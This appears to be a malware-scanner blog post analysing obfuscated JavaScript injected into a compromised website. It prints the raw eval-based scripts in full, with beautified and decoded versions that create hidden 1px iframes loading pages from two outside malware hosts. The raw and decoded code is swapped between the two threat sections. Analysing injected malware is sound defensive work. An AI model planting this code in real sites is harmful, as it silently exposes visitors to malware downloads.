Injected JavaScript code generates malicious iframes
Background
Online Website Malware Scanner has identified malicious JavaScript code injection inside the scanned website. The iframe leads to Blacklisted website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor. This infected website hosts suspicious JavaScript code injected in 13 files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and usually contains single or multiple levels of obfuscation to overcome the detection mechanisms. The site contains two malicious iframes connecting to two different URLs.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources(websites).
Website malware scan report
Submission date: Fri Apr 5 07:31:49 2013
Infected website's files: 13
Website malware scan report: http://goo.gl/INLoi
Website malware report |
Malware entry details
Threat dump no.1:
[[ asgq=[0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x28,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x76,0x61,0x72,0x20,0x75,0x69,0x71,0x71,0x63,0x20,0x3d,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x63,0x72,0x65,0x61,0x74,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x28,0x27,0x69,0x66,0x72,0x61,0x6d,0x65,0x27,0x29,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x72,0x63,0x20,0x3d,0x20,0x27,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x70,0x6c,0x61,0x79,0x6c,0x69,0x6f,0x6e,0x2e,0x74,0x6b,0x2f,0x64,0x74,0x64,0x2e,0x70,0x68,0x70,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x70,0x6f,0x73,0x69,0x74,0x69,0x6f,0x6e,0x20,0x3d,0x20,0x27,0x61,0x62,0x73,0x6f,0x6c,0x75,0x74,0x65,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x62,0x6f,0x72,0x64,0x65,0x72,0x20,0x3d,0x20,0x27,0x30,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x68,0x65,0x69,0x67,0x68,0x74,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x77,0x69,0x64,0x74,0x68,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x6c,0x65,0x66,0x74,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x69,0x71,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x74,0x6f,0x70,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x69,0x66,0x20,0x28,0x21,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x75,0x69,0x71,0x71,0x63,0x27,0x29,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x77,0x72,0x69,0x74,0x65,0x28,0x27,0x3c,0x64,0x69,0x76,0x20,0x69,0x64,0x3d,0x5c,0x27,0x75,0x69,0x71,0x71,0x63,0x5c,0x27,0x3e,0x3c,0x2f,0x64,0x69,0x76,0x3e,0x27,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x75,0x69,0x71,0x71,0x63,0x27,0x29,0x2e,0x61,0x70,0x70,0x65,0x6e,0x64,0x43,0x68,0x69,0x6c,0x64,0x28,0x75,0x69,0x71,0x71,0x63,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x7d,0xd,0xa,0x7d,0x29,0x28,0x29,0x3b];try{document.body|=1}catch(gdsgsdg){zz=3;dbshre=110;if(dbshre){vfvwe=0;try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["eval"];}s="";for(i=0;i-488!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}z=s;e(s);}}]]
Beautified malicious script
- <script>
- ff = String;
- fff = "fromCharCode";
- ff = ff[fff];
- zz = 3;
- try {
- document.body % 26 = 5151
- } catch (gdsgd) {
- v = "eval";
- if (document) try {
- document.body = 12;
- } catch (gdsgsdg) {
- asd = 0;
- try {
- document;
- } catch (q) {
- asd = 1;
- }
- }
- if (!asd) e = window[v];
- if (1) {
- f = new Array(050, 0146, 0165, 0156, 0143, 0164, 0151, 0157, 0156, 040, 050, 051, 040, 0173, 015, 012,040, 040, 040, 040, 0166, 0141, 0162, 040, 0163, 0143, 0171, 0171, 0144, 040, 075, 040, 0144, 0157, 0143, 0165,0155, 0145, 0156, 0164, 056, 0143, 0162, 0145, 0141, 0164, 0145, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 050,047, 0151, 0146, 0162, 0141, 0155, 0145, 047, 051, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0163, 0143, 0171,0171, 0144, 056, 0163, 0162, 0143, 040, 075, 040, 047, 0150, 0164, 0164, 0160, 072, 057, 057, 0166, 0151, 0163,0155, 0141, 0151, 0157, 0162, 056, 0157, 061, 062, 056, 0160, 0154, 057, 0141, 0144, 0155, 0151, 0156, 0151, 0163,0164, 0162, 0141, 0164, 0157, 0162, 057, 0145, 0163, 0144, 056, 0160, 0150, 0160, 047, 073, 015, 012, 040, 040,040, 040, 0163, 0143, 0171, 0171, 0144, 056, 0163, 0164, 0171, 0154, 0145, 056, 0160, 0157, 0163, 0151, 0164,0151, 0157, 0156, 040, 075, 040, 047, 0141, 0142, 0163, 0157, 0154, 0165, 0164, 0145, 047, 073, 015, 012, 040,040, 040, 040, 0163, 0143, 0171, 0171, 0144, 056, 0163, 0164, 0171, 0154, 0145, 056, 0142, 0157, 0162, 0144, 0145,0162, 040, 075, 040, 047, 060, 047, 073, 015, 012, 040, 040, 040, 040, 0163, 0143, 0171, 0171, 0144, 056, 0163,0164, 0171, 0154, 0145, 056, 0150, 0145, 0151, 0147, 0150, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073,015, 012, 040, 040, 040, 040, 0163, 0143, 0171, 0171, 0144, 056, 0163, 0164, 0171, 0154, 0145, 056, 0167, 0151,0144, 0164, 0150, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0163, 0143, 0171,0171, 0144, 056, 0163, 0164, 0171, 0154, 0145, 056, 0154, 0145, 0146, 0164, 040, 075, 040, 047, 061, 0160, 0170,047, 073, 015, 012, 040, 040, 040, 040, 0163, 0143, 0171, 0171, 0144, 056, 0163, 0164, 0171, 0154, 0145, 056,0164, 0157, 0160, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0151,0146, 040, 050, 041, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145,0155, 0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0163, 0143, 0171, 0171, 0144, 047, 051, 051, 040, 0173,015, 012, 040, 040, 040, 040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0167, 0162,0151, 0164, 0145, 050, 047, 074, 0144, 0151, 0166, 040, 0151, 0144, 075, 0134, 047, 0163, 0143, 0171, 0171, 0144,0134, 047, 076, 074, 057, 0144, 0151, 0166, 076, 047, 051, 073, 015, 012, 040, 040, 040, 040, 040, 040, 040, 040,0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164,0102, 0171, 0111, 0144, 050, 047, 0163, 0143, 0171, 0171, 0144, 047, 051, 056, 0141, 0160, 0160, 0145, 0156, 0144,0103, 0150, 0151, 0154, 0144, 050, 0163, 0143, 0171, 0171, 0144, 051, 073, 015, 012, 040, 040, 040, 040, 0175,015, 012, 0175, 051, 050, 051, 073);
- }
- w = f;
- s = [];
- if (window.document) for (i = 2 - 2; - i + 506 != 0; i += 1) {
- j = i;
- if ((031 == 0x19)) if (e) s = s + ff(w[j]);
- }
- xz = e;
- if (window.document) if (v) xz(s)
- }
- </script>
Simplified version of the threat
- <script>
- f = new Array(050, 0146, 0165, 0156, 0143, 0164, 0151, 0157, 0156, 040, 050, 051, 040, 0173, 015, 012, 040, 040,040, 040, 0166, 0141, 0162, 040, 016 ....
- s = "";
- for (i = 2 - 2; - i + 506 != 0; i += 1) { s = s + String.fromCharCode(f[i]); }
- eval(s);
- </script>
Malicious payload
decoded payload generates hidden iframe to malicious URL http://vismaior[.]o12[.]pl/administrator/esd.php- (function () {
- var scyyd = document.createElement('iframe');
- scyyd.src = 'http://vismaior[.]o12[.]pl/administrator/esd.php';
- scyyd.style.position = 'absolute';
- scyyd.style.border = '0';
- scyyd.style.height = '1px';
- scyyd.style.width = '1px';
- scyyd.style.left = '1px';
- scyyd.style.top = '1px';
- if (!document.getElementById('scyyd')) {
- document.write('<div id=\'scyyd\'></div>');
- document.getElementById('scyyd').appendChild(scyyd);
- }
- })();
Threat dump no.2:
[[ ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body%26=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0163,0143,0171,0171,0144,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0166,0151,0163,0155,0141,0151,0157,0162,056,0157,061,062,056,0160,0154,057,0141,0144,0155,0151,0156,0151,0163,0164,0162,0141,0164,0157,0162,057,0145,0163,0144,056,0160,0150,0160,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0163,0143,0171,0171,0144,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0163,0143,0171,0171,0144,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0163,0143,0171,0171,0144,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0163,0143,0171,0171,0144,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0163,0143,0171,0171,0144,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+506!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(window.document)if(v)xz(s)}]]
Beautified malicious script
- asgq = [0x28, 0x66, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x28, 0x29, 0x20, 0x7b, 0xd, 0xa, 0x20, 0x20,0x20, 0x20, 0x76, 0x61, 0x72, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x20, 0x3d, 0x20, 0x64, 0x6f, 0x63, 0x75, 0x6d,0x65, 0x6e, 0x74, 0x2e, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x45, 0x6c, 0x65, 0x6d, 0x65, 0x6e, 0x74, 0x28, 0x27,0x69, 0x66, 0x72, 0x61, 0x6d, 0x65, 0x27, 0x29, 0x3b, 0xd, 0xa, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69,0x71, 0x71, 0x63, 0x2e, 0x73, 0x72, 0x63, 0x20, 0x3d, 0x20, 0x27, 0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f, 0x70,0x6c, 0x61, 0x79, 0x6c, 0x69, 0x6f, 0x6e, 0x2e, 0x74, 0x6b, 0x2f, 0x64, 0x74, 0x64, 0x2e, 0x70, 0x68, 0x70, 0x27,0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e,0x70, 0x6f, 0x73, 0x69, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x3d, 0x20, 0x27, 0x61, 0x62, 0x73, 0x6f, 0x6c, 0x75, 0x74,0x65, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x2e, 0x73, 0x74, 0x79, 0x6c,0x65, 0x2e, 0x62, 0x6f, 0x72, 0x64, 0x65, 0x72, 0x20, 0x3d, 0x20, 0x27, 0x30, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20,0x20, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x68, 0x65, 0x69, 0x67, 0x68,0x74, 0x20, 0x3d, 0x20, 0x27, 0x31, 0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x71,0x71, 0x63, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x77, 0x69, 0x64, 0x74, 0x68, 0x20, 0x3d, 0x20, 0x27, 0x31,0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x2e, 0x73, 0x74, 0x79,0x6c, 0x65, 0x2e, 0x6c, 0x65, 0x66, 0x74, 0x20, 0x3d, 0x20, 0x27, 0x31, 0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0x20,0x20, 0x20, 0x20, 0x75, 0x69, 0x71, 0x71, 0x63, 0x2e, 0x73, 0x74, 0x79, 0x6c, 0x65, 0x2e, 0x74, 0x6f, 0x70, 0x20,0x3d, 0x20, 0x27, 0x31, 0x70, 0x78, 0x27, 0x3b, 0xd, 0xa, 0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x69, 0x66, 0x20,0x28, 0x21, 0x64, 0x6f, 0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x67, 0x65, 0x74, 0x45, 0x6c, 0x65, 0x6d, 0x65,0x6e, 0x74, 0x42, 0x79, 0x49, 0x64, 0x28, 0x27, 0x75, 0x69, 0x71, 0x71, 0x63, 0x27, 0x29, 0x29, 0x20, 0x7b, 0xd,0xa, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x64, 0x6f, 0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x77,0x72, 0x69, 0x74, 0x65, 0x28, 0x27, 0x3c, 0x64, 0x69, 0x76, 0x20, 0x69, 0x64, 0x3d, 0x5c, 0x27, 0x75, 0x69, 0x71,0x71, 0x63, 0x5c, 0x27, 0x3e, 0x3c, 0x2f, 0x64, 0x69, 0x76, 0x3e, 0x27, 0x29, 0x3b, 0xd, 0xa, 0x20, 0x20, 0x20,0x20, 0x20, 0x20, 0x20, 0x20, 0x64, 0x6f, 0x63, 0x75, 0x6d, 0x65, 0x6e, 0x74, 0x2e, 0x67, 0x65, 0x74, 0x45, 0x6c,0x65, 0x6d, 0x65, 0x6e, 0x74, 0x42, 0x79, 0x49, 0x64, 0x28, 0x27, 0x75, 0x69, 0x71, 0x71, 0x63, 0x27, 0x29, 0x2e,0x61, 0x70, 0x70, 0x65, 0x6e, 0x64, 0x43, 0x68, 0x69, 0x6c, 0x64, 0x28, 0x75, 0x69, 0x71, 0x71, 0x63, 0x29, 0x3b,0xd, 0xa, 0x20, 0x20, 0x20, 0x20, 0x7d, 0xd, 0xa, 0x7d, 0x29, 0x28, 0x29, 0x3b];
- try {
- document.body |= 1
- } catch (gdsgsdg) {
- zz = 3;
- dbshre = 110;
- if (dbshre) {
- vfvwe = 0;
- try {} catch (agdsg) {
- vfvwe = 1;
- }
- if (!vfvwe) {
- e = window["eval"];
- }
- s = "";
- for (i = 0; i - 488 != 0; i++) {
- if (window.document) s += String.fromCharCode(asgq[i]);
- }
- z = s;
- e(s);
- }
- }
Simplified version of the threat
- asgq = [0x28, 0x66, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x20, 0x28, 0x29, 0x20, 0x7b, 0xd, 0xa, 0x20, 0x20,0x20, 0x20, 0x76, 0x61, 0x72, 0x20, 0x...
- s = "";
- for (i = 0; i - 488 != 0; i++) { s += String.fromCharCode(asgq[i]); }
- eval(s);
Malicious payload
decoded payload generates hidden iframe to malicious URL http://playlion[.]tk/dtd[.]php- (function () {
- var uiqqc = document.createElement('iframe');
- uiqqc.src = 'http://playlion.tk/dtd.php';
- uiqqc.style.position = 'absolute';
- uiqqc.style.border = '0';
- uiqqc.style.height = '1px';
- uiqqc.style.width = '1px';
- uiqqc.style.left = '1px';
- uiqqc.style.top = '1px';
- if (!document.getElementById('uiqqc')) {
- document.write('<div id=\'uiqqc\'></div>');
- document.getElementById('uiqqc').appendChild(uiqqc);
- }
- })();
Blacklisting status
Google Safe Browsing diagnostic |
No comments:
Post a Comment